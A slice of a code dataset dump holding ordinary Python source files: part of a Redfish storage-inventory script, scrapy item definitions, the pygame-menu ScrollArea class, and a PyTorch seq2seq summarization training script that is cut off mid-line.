response_storage_x_url.dict[\"StorageControllers\"][controller][\"PartNumber\"]\n DurableNameFormat = response_storage_x_url.dict[\"StorageControllers\"][controller][\"Identifiers\"][0][\n \"DurableNameFormat\"]\n DurableName = response_storage_x_url.dict[\"StorageControllers\"][controller][\"Identifiers\"][0][\"DurableName\"]\n storage_controller[Manufacturer] = Manufacturer\n storage_controller[\"Model\"] = Model\n storage_controller[\"SerialNumber\"] = SerialNumber\n storage_controller[\"FirmwareVersion\"] = FirmwareVersion\n storage_controller[\"PartNumber\"] = PartNumber\n storage_controller[\"DurableNameFormat\"] = DurableNameFormat\n storage_controller[\"DurableName\"] = DurableName\n storage_list.append(storage_controller)\n storage['torage_controller'] = storage_list\n storage_details.append(storage)\n else:\n result = {'ret': False, 'msg': \"response_storage_x_url code %s\" % response_storage_x_url.status}\n REDFISH_OBJ.logout()\n return result\n else:\n result = {'ret': False, 'msg': \"response storage url Error code %s\" % response_storage_url.status}\n REDFISH_OBJ.logout()\n\n else:\n result = {'ret': False, 'msg': \"response_system_url Error code %s\" % response_system_url.status}\n REDFISH_OBJ.logout()\n return result\n\n result['ret'] = True\n result['entries'] = storage_details\n # Logout of the current session\n REDFISH_OBJ.logout()\n return result\n\n\nif __name__ == '__main__':\n # Get parameters from config.ini and/or command line\n argget = utils.create_common_parameter_list()\n args = argget.parse_args()\n parameter_info = utils.parse_parameter(args)\n \n # Get connection info from the parameters user specified\n ip = parameter_info['ip']\n login_account = parameter_info[\"user\"]\n login_password = parameter_info[\"passwd\"]\n system_id = parameter_info['sysid']\n \n # Get storage inventory and check result\n result = get_storage_info(ip, login_account, login_password, system_id)\n if result['ret'] is True:\n del result['ret']\n sys.stdout.write(json.dumps(result['entries'], sort_keys=True, indent=2))\n else:\n sys.stderr.write(result['msg'])","sub_path":"examples/get_storage_inventory.py","file_name":"get_storage_inventory.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"339550358","text":"from scrapy.item import Item, Field\n\n\nclass Website(Item):\n\n name = Field()\n description = Field()\n url = Field()\n\nclass GoogleNews(Item):\n\n raw_html_tr = Field()\n title = Field()\n press = Field()\n time = Field()\n url = Field()\n img_url = Field()\n #tgt_html = Field()\n tgt_url = Field()\n abstract = Field()\n news_id = Field()\n keywords = Field()\n\nclass GoogleSearch(Item):\n name = Field()\n votes = Field()\n","sub_path":"dirbot/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"149091535","text":"\"\"\"\npygame-menu\nhttps://github.com/ppizarror/pygame-menu\n\nSCROLLAREA\nScrollArea class to manage scrolling in Menu.\n\nLicense:\n-------------------------------------------------------------------------------\nThe MIT License (MIT)\nCopyright 2017-2021 Pablo Pizarro R. @ppizarror\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software\nis furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n-------------------------------------------------------------------------------\n\"\"\"\n\n__all__ = ['ScrollArea', 'get_scrollbars_from_position']\n\nimport pygame\nimport pygame_menu\nimport pygame_menu.locals as _locals\nfrom pygame_menu._decorator import Decorator\nfrom pygame_menu.utils import make_surface, assert_color, assert_position\nfrom pygame_menu.widgets import ScrollBar, MenuBar\n\nfrom pygame_menu._types import ColorType, Union, NumberType, Tuple, List, Dict, \\\n Tuple2NumberType, Optional, Tuple2IntType\n\n\ndef get_scrollbars_from_position(position: str) -> Union[str, Tuple[str, str], Tuple[str, str, str, str]]:\n \"\"\"\n Return the scrollbars from the given position.\n Raises ``ValueError`` if invalid position.\n\n :param position: Position\n :return: Scrollbars\n \"\"\"\n if position in (_locals.POSITION_EAST, _locals.POSITION_EAST, _locals.POSITION_WEST, _locals.POSITION_NORTH):\n return position\n elif position == _locals.POSITION_NORTHWEST:\n return _locals.POSITION_NORTH, _locals.POSITION_WEST\n elif position == _locals.POSITION_NORTHEAST:\n return _locals.POSITION_NORTH, _locals.POSITION_EAST\n elif position == _locals.POSITION_SOUTHWEST:\n return _locals.POSITION_SOUTH, _locals.POSITION_WEST\n elif position == _locals.POSITION_SOUTHEAST:\n return _locals.POSITION_SOUTH, _locals.POSITION_EAST\n elif position == _locals.SCROLLAREA_POSITION_FULL:\n return _locals.POSITION_SOUTH, _locals.POSITION_EAST, _locals.POSITION_WEST, _locals.POSITION_NORTH\n elif position == _locals.SCROLLAREA_POSITION_BOTH_HORIZONTAL:\n return _locals.POSITION_SOUTH, _locals.POSITION_NORTH\n elif position == _locals.SCROLLAREA_POSITION_BOTH_VERTICAL:\n return _locals.POSITION_EAST, _locals.POSITION_WEST\n elif position == _locals.POSITION_CENTER:\n raise ValueError('cannot init strollbars from center position')\n else:\n raise ValueError('unknown ScrollArea position')\n\n\nSCROLL_VERTICAL = _locals.ORIENTATION_VERTICAL\nSCROLL_HORIZONTAL = _locals.ORIENTATION_HORIZONTAL\n\n\nclass ScrollArea(object):\n \"\"\"\n The ScrollArea class provides a scrolling view managing up to 4 scroll bars.\n\n A scroll area is used to display the contents of a child surface (``world``).\n If the surface exceeds the size of the drawing surface, the view provide\n scroll bars so that the entire area of the child surface can be viewed.\n\n .. note::\n\n See :py:mod:`pygame_menu.locals` for valid ``scrollbars`` and\n ``shadow_position`` values.\n\n .. note::\n\n ScrollArea cannot be copied or deepcopied.\n\n :param area_width: Width of scrollable area (px)\n :param area_height: Height of scrollable area (px)\n :param area_color: Background color, it can be a color or an image\n :param cursor: Scrollbar cursors\n :param menubar: Menubar for style compatibility\n :param extend_x: Px to extend the surface in x axis (px) from left\n :param extend_y: Px to extend the surface in y axis (px) from top\n :param scrollbar_color: Scrollbars color\n :param scrollbar_slider_color: Color of the sliders\n :param scrollbar_slider_pad: Space between slider and scrollbars borders\n :param scrollbar_thick: Scrollbars thickness\n :param scrollbars: Positions of the scrollbars\n :param shadow: Indicate if a shadow is drawn on each scrollbar\n :param shadow_color: Color of the shadow\n :param shadow_offset: Offset of shadow\n :param shadow_position: Position of shadow\n :param world: Surface to draw and scroll\n \"\"\"\n _bg_surface: Optional['pygame.Surface']\n _decorator: 'Decorator'\n _extend_x: int\n _extend_y: int\n _menu: Optional['pygame_menu.Menu']\n _menubar: 'pygame_menu.widgets.MenuBar'\n _rect: 'pygame.Rect'\n _scrollbar_positions: Tuple[str, ...]\n _scrollbar_thick: NumberType\n _scrollbars: List['ScrollBar']\n _view_rect: 'pygame.Rect'\n _world: 'pygame.Surface'\n\n def __init__(self,\n area_width: int,\n area_height: int,\n area_color: Optional[Union[ColorType, 'pygame_menu.BaseImage']] = None,\n cursor: Optional[Union[int, 'pygame.cursors.Cursor']] = None,\n extend_x: int = 0,\n extend_y: int = 0,\n menubar: Optional['MenuBar'] = None,\n scrollbar_color: ColorType = (235, 235, 235),\n scrollbar_slider_color: ColorType = (200, 200, 200),\n scrollbar_slider_pad: NumberType = 0,\n scrollbar_thick: NumberType = 20,\n scrollbars: Union[str, Tuple[str, ...]] = get_scrollbars_from_position(_locals.POSITION_SOUTHEAST),\n shadow: bool = False,\n shadow_color: ColorType = (0, 0, 0),\n shadow_offset: NumberType = 2,\n shadow_position: str = _locals.POSITION_SOUTHEAST,\n world: Optional['pygame.Surface'] = None\n ) -> None:\n assert isinstance(area_width, int)\n assert isinstance(area_height, int)\n assert isinstance(scrollbar_slider_pad, (int, float))\n assert isinstance(scrollbar_thick, (int, float))\n assert isinstance(shadow, bool)\n assert isinstance(shadow_offset, (int, float))\n assert isinstance(world, (pygame.Surface, type(None)))\n\n assert_color(scrollbar_color)\n assert_color(scrollbar_slider_color)\n assert_color(shadow_color)\n assert_position(shadow_position)\n\n assert area_width > 0 and area_height > 0, \\\n 'area size must be greater than zero'\n\n self._bg_surface = None\n self._decorator = Decorator(self)\n self._rect = pygame.Rect(0, 0, int(area_width), int(area_height))\n self._scrollbar_positions = tuple(set(scrollbars)) # Ensure unique\n self._scrollbar_thick = scrollbar_thick\n self._scrollbars = []\n self._world = world\n\n self._extend_x = extend_x\n self._extend_y = extend_y\n self._menubar = menubar\n\n if area_color:\n self._bg_surface = make_surface(width=area_width + extend_x,\n height=area_height + self._extend_y)\n if isinstance(area_color, pygame_menu.BaseImage):\n area_color.draw(surface=self._bg_surface, area=self._bg_surface.get_rect())\n else:\n self._bg_surface.fill(area_color)\n\n self._view_rect = self.get_view_rect()\n\n for pos in self._scrollbar_positions:\n assert_position(pos)\n\n if pos == _locals.POSITION_EAST or pos == _locals.POSITION_WEST:\n sbar = ScrollBar(\n length=self._view_rect.height,\n values_range=(0, max(1, self.get_hidden_height())),\n orientation=SCROLL_VERTICAL,\n slider_pad=scrollbar_slider_pad,\n slider_color=scrollbar_slider_color,\n page_ctrl_thick=scrollbar_thick,\n page_ctrl_color=scrollbar_color,\n onchange=self._on_vertical_scroll\n )\n else:\n sbar = ScrollBar(\n length=self._view_rect.width,\n values_range=(0, max(1, self.get_hidden_width())),\n slider_pad=scrollbar_slider_pad,\n slider_color=scrollbar_slider_color,\n page_ctrl_thick=scrollbar_thick,\n page_ctrl_color=scrollbar_color,\n onchange=self._on_horizontal_scroll\n )\n sbar.set_shadow(\n enabled=shadow,\n color=shadow_color,\n position=shadow_position,\n offset=shadow_offset\n )\n sbar.set_controls(joystick=False)\n sbar.set_cursor(cursor=cursor)\n\n self._scrollbars.append(sbar)\n\n self._apply_size_changes()\n\n # Menu reference\n self._menu = None\n\n def __copy__(self) -> 'ScrollArea':\n \"\"\"\n Copy method.\n\n :return: Raises copy exception\n \"\"\"\n raise _ScrollAreaCopyException('ScrollArea class cannot be copied')\n\n def __deepcopy__(self, memodict: Dict) -> 'ScrollArea':\n \"\"\"\n Deepcopy method.\n\n :param memodict: Memo dict\n :return: Raises copy exception\n \"\"\"\n raise _ScrollAreaCopyException('ScrollArea class cannot be copied')\n\n def force_menu_surface_update(self) -> 'ScrollArea':\n \"\"\"\n Forces menu surface update after next rendering call.\n\n .. note ::\n\n This method is expensive, as menu surface update forces re-rendering of\n all widgets (because them can change in size, position, etc...).\n\n :return: Self reference\n \"\"\"\n if self._menu is not None:\n self._menu._widgets_surface_need_update = True\n return self\n\n def force_menu_surface_cache_update(self) -> 'ScrollArea':\n \"\"\"\n Forces menu surface cache to update after next drawing call.\n This also updates widget decoration.\n\n .. note::\n\n This method only updates the surface cache, without forcing re-rendering\n of all Menu widgets as :py:meth:`pygame_menu.widgets.core.widget.Widget.force_menu_surface_update`\n does.\n\n :return: Self reference\n \"\"\"\n if self._menu is not None:\n self._menu._widget_surface_cache_need_update = True\n self._decorator.force_cache_update()\n return self\n\n def _apply_size_changes(self) -> None:\n \"\"\"\n Apply size changes to scrollbar.\n\n :return: None\n \"\"\"\n self._view_rect = self.get_view_rect()\n for sbar in self._scrollbars:\n pos = self._scrollbar_positions[self._scrollbars.index(sbar)]\n\n dsize, dx, dy = 0, 0, 0\n if self._menubar is not None:\n dsize, (dx, dy) = self._menubar.get_scrollbar_style_change(pos)\n\n if pos == _locals.POSITION_WEST:\n sbar.set_position(self._view_rect.left - self._scrollbar_thick + dx, self._view_rect.top + dy)\n elif pos == _locals.POSITION_EAST:\n sbar.set_position(self._view_rect.right + dx, self._view_rect.top + dy)\n elif pos == _locals.POSITION_NORTH:\n sbar.set_position(self._view_rect.left + dx, self._view_rect.top - self._scrollbar_thick + dy)\n elif pos == _locals.POSITION_SOUTH: # South\n sbar.set_position(self._view_rect.left + dx, self._view_rect.bottom + dy)\n elif pos == _locals.POSITION_CENTER:\n raise ValueError('center position cannot be applied to scrollbar')\n else:\n raise ValueError('unknown position')\n\n if pos in (_locals.POSITION_NORTH, _locals.POSITION_SOUTH) \\\n and self.get_hidden_width() != sbar.get_maximum() \\\n and self.get_hidden_width() != 0:\n sbar.set_length(self._view_rect.width + dsize)\n sbar.set_maximum(self.get_hidden_width())\n sbar.set_page_step(self._view_rect.width * self.get_hidden_width() /\n (self._view_rect.width + self.get_hidden_width()))\n\n elif pos in (_locals.POSITION_EAST, _locals.POSITION_WEST) \\\n and self.get_hidden_height() != sbar.get_maximum() \\\n and self.get_hidden_height() != 0:\n sbar.set_length(self._view_rect.height + dsize)\n sbar.set_maximum(self.get_hidden_height())\n sbar.set_page_step(self._view_rect.height * self.get_hidden_height() /\n (self._view_rect.height + self.get_hidden_height()))\n\n def draw(self, surface: 'pygame.Surface') -> 'ScrollArea':\n \"\"\"\n Draw the scrollarea.\n\n :param surface: Surface to render the area\n :return: Self reference\n \"\"\"\n if not self._world:\n return self\n\n # Background surface already has previous decorators\n if self._bg_surface:\n surface.blit(self._bg_surface, (self._rect.x - self._extend_x, self._rect.y - self._extend_y))\n\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_HORIZONTAL:\n if self.get_hidden_width():\n sbar.draw(surface)\n else:\n if self.get_hidden_height():\n sbar.draw(surface)\n\n # noinspection PyTypeChecker\n surface.blit(self._world, self._view_rect.topleft, (self.get_offsets(), self._view_rect.size))\n self._decorator.draw_post(surface)\n return self\n\n def get_hidden_width(self) -> int:\n \"\"\"\n Return the total width out of the bounds of the viewable area.\n Zero is returned if the world width is lower than the viewable area.\n\n :return: Hidden width (px)\n \"\"\"\n if not self._world:\n return 0\n return int(max(0, self._world.get_width() - self._view_rect.width))\n\n def get_hidden_height(self) -> int:\n \"\"\"\n Return the total height out of the bounds of the viewable area.\n Zero is returned if the world height is lower than the viewable area.\n\n :return: Hidden height (px)\n \"\"\"\n if not self._world:\n return 0\n return int(max(0, self._world.get_height() - self._view_rect.height))\n\n def get_offsets(self) -> Tuple2IntType:\n \"\"\"\n Return the offset introduced by the scrollbars in the world.\n\n :return: ScrollArea offset *(x, y)*\n \"\"\"\n offsets = [0, 0]\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_HORIZONTAL:\n if self.get_hidden_width():\n offsets[0] = sbar.get_value()\n else:\n if self.get_hidden_height():\n offsets[1] = sbar.get_value()\n return offsets[0], offsets[1]\n\n def get_rect(self) -> 'pygame.Rect':\n \"\"\"\n Return the :py:class:`pygame.Rect` object of the ScrollArea.\n\n :return: Pygame.Rect object\n \"\"\"\n return self._rect.copy()\n\n def get_scrollbar_thickness(self, orientation: str, real: bool = False) -> int:\n \"\"\"\n Return the scroll thickness of the area. If it's hidden return zero.\n\n :param orientation: Orientation of the scroll\n :param real: If ``True`` returns the real thickness depending if it is shown or not\n :return: Thickness (px)\n \"\"\"\n assert isinstance(real, bool)\n if real:\n for sbar in self._scrollbars:\n if sbar.get_orientation() == orientation:\n return sbar.get_thickness()\n if orientation == SCROLL_HORIZONTAL:\n return int(self._rect.height - self._view_rect.height)\n elif orientation == SCROLL_VERTICAL:\n return int(self._rect.width - self._view_rect.width)\n return 0\n\n def get_view_rect(self) -> 'pygame.Rect':\n \"\"\"\n Subtract width of scrollbars from area with the given size and return\n the viewable area.\n\n The viewable area depends on the world size, because scroll bars may\n or may not be displayed.\n\n :return: View rect object\n \"\"\"\n rect = pygame.Rect(self._rect)\n\n # No scrollbar: area is large enough to display world\n if not self._world or (self._world.get_width() <= self._rect.width\n and self._world.get_height() <= self._rect.height):\n return rect\n\n # All scrollbars: the world is too large\n if self._world.get_height() > self._rect.height \\\n and self._world.get_width() > self._rect.width:\n if _locals.POSITION_WEST in self._scrollbar_positions:\n rect.left += self._scrollbar_thick\n rect.width -= self._scrollbar_thick\n if _locals.POSITION_EAST in self._scrollbar_positions:\n rect.width -= self._scrollbar_thick\n if _locals.POSITION_NORTH in self._scrollbar_positions:\n rect.top += self._scrollbar_thick\n rect.height -= self._scrollbar_thick\n if _locals.POSITION_SOUTH in self._scrollbar_positions:\n rect.height -= self._scrollbar_thick\n return rect\n\n # Calculate the maximum variations introduces by the scrollbars\n bars_total_width = 0\n bars_total_height = 0\n if _locals.POSITION_NORTH in self._scrollbar_positions:\n bars_total_height += self._scrollbar_thick\n if _locals.POSITION_SOUTH in self._scrollbar_positions:\n bars_total_height += self._scrollbar_thick\n if _locals.POSITION_WEST in self._scrollbar_positions:\n bars_total_width += self._scrollbar_thick\n if _locals.POSITION_EAST in self._scrollbar_positions:\n bars_total_width += self._scrollbar_thick\n\n if self._world.get_height() > self._rect.height:\n if _locals.POSITION_WEST in self._scrollbar_positions:\n rect.left += self._scrollbar_thick\n rect.width -= self._scrollbar_thick\n if _locals.POSITION_EAST in self._scrollbar_positions:\n rect.width -= self._scrollbar_thick\n if self._world.get_width() > self._rect.width - bars_total_width:\n if _locals.POSITION_NORTH in self._scrollbar_positions:\n rect.top += self._scrollbar_thick\n rect.height -= self._scrollbar_thick\n if _locals.POSITION_SOUTH in self._scrollbar_positions:\n rect.height -= self._scrollbar_thick\n\n if self._world.get_width() > self._rect.width:\n if _locals.POSITION_NORTH in self._scrollbar_positions:\n rect.top += self._scrollbar_thick\n rect.height -= self._scrollbar_thick\n if _locals.POSITION_SOUTH in self._scrollbar_positions:\n rect.height -= self._scrollbar_thick\n if self._world.get_height() > self._rect.height - bars_total_height:\n if _locals.POSITION_WEST in self._scrollbar_positions:\n rect.left += self._scrollbar_thick\n rect.width -= self._scrollbar_thick\n if _locals.POSITION_EAST in self._scrollbar_positions:\n rect.width -= self._scrollbar_thick\n\n return rect\n\n def get_world_size(self) -> Tuple2IntType:\n \"\"\"\n Return the world size.\n\n :return: Width, height in pixels\n \"\"\"\n if self._world is None:\n return 0, 0\n return self._world.get_width(), self._world.get_height()\n\n def _on_horizontal_scroll(self, value: NumberType) -> None:\n \"\"\"\n Call when a horizontal scroll bar as changed to update the\n position of the opposite one if it exists.\n\n :param value: New position of the slider\n :return: None\n \"\"\"\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_HORIZONTAL \\\n and self.get_hidden_width() != 0 \\\n and sbar.get_value() != value:\n sbar.set_value(value)\n\n def _on_vertical_scroll(self, value: NumberType) -> None:\n \"\"\"\n Call when a vertical scroll bar as changed to update the\n position of the opposite one if it exists.\n\n :param value: New position of the slider\n :return: None\n \"\"\"\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_VERTICAL \\\n and self.get_hidden_height() != 0 \\\n and sbar.get_value() != value:\n sbar.set_value(value)\n\n # noinspection PyTypeChecker\n def scroll_to_rect(self, rect: 'pygame.Rect', margin: NumberType = 10) -> bool:\n \"\"\"\n Ensure that the given rect is in the viewable area.\n\n :param rect: Rect in the world surface reference\n :param margin: Extra margin around the rect (px)\n :return: Scrollarea scrolled to rect. If ``False`` the rect was already inside the visible area\n \"\"\"\n assert isinstance(margin, (int, float))\n real_rect = self.to_real_position(rect)\n\n # Check rect is in viewable area\n sx = self.get_scrollbar_thickness(SCROLL_VERTICAL)\n sy = self.get_scrollbar_thickness(SCROLL_HORIZONTAL)\n if self._view_rect.topleft[0] <= real_rect.topleft[0] + sx \\\n and self._view_rect.topleft[1] <= real_rect.topleft[1] + sy \\\n and self._view_rect.bottomright[0] + sx >= real_rect.bottomright[0] \\\n and self._view_rect.bottomright[1] + sy >= real_rect.bottomright[1]:\n return False\n\n for sbar in self._scrollbars:\n if sbar.get_orientation() == SCROLL_HORIZONTAL and self.get_hidden_width():\n shortest_move = min(real_rect.left - margin - self._view_rect.left,\n real_rect.right + margin - self._view_rect.right, key=abs)\n value = min(sbar.get_maximum(), sbar.get_value() + shortest_move)\n value = max(sbar.get_minimum(), value)\n sbar.set_value(value)\n if sbar.get_orientation() == SCROLL_VERTICAL and self.get_hidden_height():\n shortest_move = min(real_rect.bottom + margin - self._view_rect.bottom,\n real_rect.top - margin - self._view_rect.top, key=abs)\n value = min(sbar.get_maximum(), sbar.get_value() + shortest_move)\n value = max(sbar.get_minimum(), value)\n sbar.set_value(value)\n return True\n\n def set_position(self, posx: int, posy: int) -> 'ScrollArea':\n \"\"\"\n Set the position.\n\n :param posx: X position\n :param posy: Y position\n :return: Self reference\n \"\"\"\n self._rect.x = posx\n self._rect.y = posy\n self._apply_size_changes()\n return self\n\n def set_world(self, surface: 'pygame.Surface') -> 'ScrollArea':\n \"\"\"\n Update the scrolled surface.\n\n :param surface: New world surface\n :return: Self reference\n \"\"\"\n self._world = surface\n self._apply_size_changes()\n return self\n\n def to_real_position(self, virtual: Union['pygame.Rect', Tuple2NumberType], visible: bool = False\n ) -> Union['pygame.Rect', Tuple2IntType]:\n \"\"\"\n Return the real position/Rect according to the scroll area origin\n of a position/Rect in the world surface reference.\n\n :param virtual: Position/Rect in the world surface reference\n :param visible: If a ``virtual`` is Rect object, return only the visible width/height\n :return: Real rect or real position\n \"\"\"\n assert isinstance(virtual, (pygame.Rect, tuple, list))\n offsets = self.get_offsets()\n\n if isinstance(virtual, pygame.Rect):\n rect = pygame.Rect(virtual)\n rect.x = self._rect.x + virtual.x - offsets[0]\n rect.y = self._rect.y + virtual.y - offsets[1]\n if visible:\n return self._view_rect.clip(rect) # Visible width and height\n return rect\n\n x_coord = self._rect.x + virtual[0] - offsets[0]\n y_coord = self._rect.y + virtual[1] - offsets[1]\n return int(x_coord), int(y_coord)\n\n def to_world_position(self, real: Union['pygame.Rect', Tuple2NumberType]\n ) -> Union['pygame.Rect', Tuple2IntType]:\n \"\"\"\n Return the position/Rect in the world surface reference\n of a real position/Rect according to the scroll area origin.\n\n :param real: Position/Rect according scroll area origin\n :return: Rect in world or position in world\n \"\"\"\n assert isinstance(real, (pygame.Rect, tuple, list))\n offsets = self.get_offsets()\n\n if isinstance(real, pygame.Rect):\n rect = pygame.Rect(real)\n rect.x = real.x - self._rect.x + offsets[0]\n rect.y = real.y - self._rect.y + offsets[1]\n return rect\n\n x_coord = real[0] - self._rect.x + offsets[0]\n y_coord = real[1] - self._rect.y + offsets[1]\n return int(x_coord), int(y_coord)\n\n def is_scrolling(self) -> bool:\n \"\"\"\n Return ``True`` if the user is scrolling.\n\n :return: ``True`` if user scrolls\n \"\"\"\n scroll = False\n for sbar in self._scrollbars:\n scroll = scroll or sbar.scrolling\n return scroll\n\n def update(self, events: List['pygame.event.Event']) -> bool:\n \"\"\"\n Called by end user to update scroll state.\n\n :param events: List of pygame events\n :return: ``True`` if updated\n \"\"\"\n updated = [0, 0]\n for sbar in self._scrollbars:\n if self.get_hidden_width() and sbar.get_orientation() == SCROLL_HORIZONTAL and not updated[0]:\n updated[0] = sbar.update(events)\n elif self.get_hidden_height() and sbar.get_orientation() == SCROLL_VERTICAL and not updated[1]:\n updated[1] = sbar.update(events)\n return updated[0] or updated[1]\n\n def set_menu(self, menu: 'pygame_menu.Menu') -> 'ScrollArea':\n \"\"\"\n Set the Menu reference.\n\n :param menu: Menu object\n :return: Self reference\n \"\"\"\n self._menu = menu\n for sbar in self._scrollbars:\n sbar.set_menu(menu)\n return self\n\n def get_menu(self) -> Optional['pygame_menu.Menu']:\n \"\"\"\n Return the Menu reference (if exists).\n\n :return: Menu reference\n \"\"\"\n return self._menu\n\n def collide(self, widget: 'pygame_menu.widgets.Widget', event: 'pygame.event.Event') -> bool:\n \"\"\"\n If user event collides a widget within the scroll area respect to the relative position.\n\n :param widget: Widget\n :param event: Pygame event\n :return: ``True`` if collide\n \"\"\"\n widget_rect = widget.get_rect()\n if hasattr(pygame, 'FINGERDOWN') and (\n event.type == pygame.FINGERDOWN or event.type == pygame.FINGERUP or\n event.type == pygame.FINGERMOTION):\n display_size = self._menu.get_window_size()\n finger_pos = (event.x * display_size[0], event.y * display_size[1])\n return bool(self.to_real_position(widget_rect).collidepoint(*finger_pos))\n else:\n return bool(self.to_real_position(widget_rect).collidepoint(*event.pos))\n\n def get_decorator(self) -> 'Decorator':\n \"\"\"\n Return the ScrollArea decorator API.\n\n .. note:: Menu drawing order:\n\n 1. Menu background color/image\n 2. Menu ``prev`` decorator\n 3. **Menu ScrollArea ``prev`` decorator**\n 4. **Menu ScrollArea widgets**\n 5. **Menu ScrollArea ``post`` decorator**\n 6. Menu title\n 7. Menu ``post`` decorator\n\n :return: Decorator API\n \"\"\"\n return self._decorator\n\n\nclass _ScrollAreaCopyException(Exception):\n \"\"\"\n If user tries to copy a ScrollArea.\n \"\"\"\n pass\n","sub_path":"pygame_menu/scrollarea.py","file_name":"scrollarea.py","file_ext":"py","file_size_in_byte":28661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"528244300","text":"import torch\nimport torch.nn as nn\nfrom torch import optim\nfrom data.dataset import SummarizationDataset\nfrom data.dataset import get_dataloader\nfrom models.AttnDecoderRNN import AttnDecoderRNN\nfrom models.EncoderRNN import EncoderRNN\nfrom data import cfg\nimport os, sys, time, math, random\nimport pdb\nfrom utils.model_saver_iter import load_model, save_model\n\nMAX_LENGTH = 500\nteacher_forcing_ratio = 0.5\n\n\ndef train(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion,\n max_length=MAX_LENGTH):\n encoder_hidden = encoder.initHidden(device)\n\n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n\n input_length = input_tensor.size(0)\n target_length = target_tensor.size(0)\n\n encoder_hiddens = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n loss = 0\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_tensor[ei], encoder_hidden)\n\n try:\n # here just use the hidden states of 1st dimension,\n # should be justified later\n encoder_hiddens[ei] = encoder_hidden[0, 0]\n except:\n pdb.set_trace()\n\n decoder_input = torch.tensor([[20000]], device=device)\n\n decoder_hidden = encoder_hidden\n\n use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n\n if use_teacher_forcing:\n # Teacher forcing: Feed the target as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_hiddens)\n loss += criterion(decoder_output, target_tensor[di].view(-1))\n decoder_input = target_tensor[di] # Teacher forcing\n\n else:\n # Without teacher forcing: use its own predictions as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_hiddens)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n\n loss += criterion(decoder_output, target_tensor[di].view(-1))\n if decoder_input.item() == 200001:\n break\n\n loss.backward()\n\n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return loss.item() / target_length\n\n\ndef trainIters(encoder, decoder, n_iters, checkpoint_dir, print_every=1000, plot_every=100, learning_rate=0.01,\n save_every=1000):\n start = time.time()\n plot_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n dataloader = get_dataloader(SummarizationDataset(\"data/finished/train.txt\", \"data/word2idx.json\"))\n\n criterion = nn.NLLLoss()\n start_iter = load_model(encoder, model_dir=checkpoint_dir, appendix='Encoder', iter=\"l\")\n start_iter_ = load_model(decoder, model_dir=checkpoint_dir, appendix='Decoder', iter=\"l\")\n assert start_iter == start_iter_\n\n data_iter = iter(dataloader)\n\n if start_iter < n_iters:\n\n for i in range(start_iter, n_iters):\n try:\n batch = next(data_iter)\n except:\n data_iter = iter(dataloader)\n batch = next(data_iter)\n\n input_tensor = batch[0][0].to(device)\n target_tensor = batch[1][0].to(device)\n\n loss = train(input_tensor, target_tensor, encoder,\n decoder, encoder_optimizer, decoder_optimizer, criterion)\n print_loss_total += loss\n plot_loss_total += loss\n\n if i % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('(%d %d%%) %.4f' % (i, i / n_iters * 100, print_loss_avg))\n\n if i % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n # Save checkpoint\n # torch.save(encoder.state_dict(), os.path.join(checkpoint_dir, \"encoder_{}.pth\".format(iter)))\n # torch.save(decoder.state_dict(), os.path.join(checkpoint_dir, \"decoder_{}.pth\".format(iter)))\n if (i + 1) % save_every == 0:\n save_model(encoder, model_dir=checkpoint_dir, appendix=\"Encoder\", iter=i + 1, save_num=3,\n save_step=save_every)\n save_model(decoder, model_dir=checkpoint_dir, appendix=\"Decoder\", iter=i + 1, save_num=3,\n save_step=save_every)\n # showPlot(plot_losses)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"USAGE: python train.py \")\n sys.exit()\n checkpoint_dir = sys.argv[1]\n\n device = torch.device('cuda:0')\n hidden_size = 256\n weights = torch.load(\"data/GloVe_embeddings.pt\")\n encoder1 = EncoderRNN(weights, cfg.EMBEDDING_SIZE, cfg.HIDDEN_SIZE, 2, dropout_p=0.1).to(device)\n attn_decoder1 = AttnDecoderRNN(weights, cfg.HIDDEN_SIZE, 200003, 2, dropout_p=0.1).to(device)\n\n if not 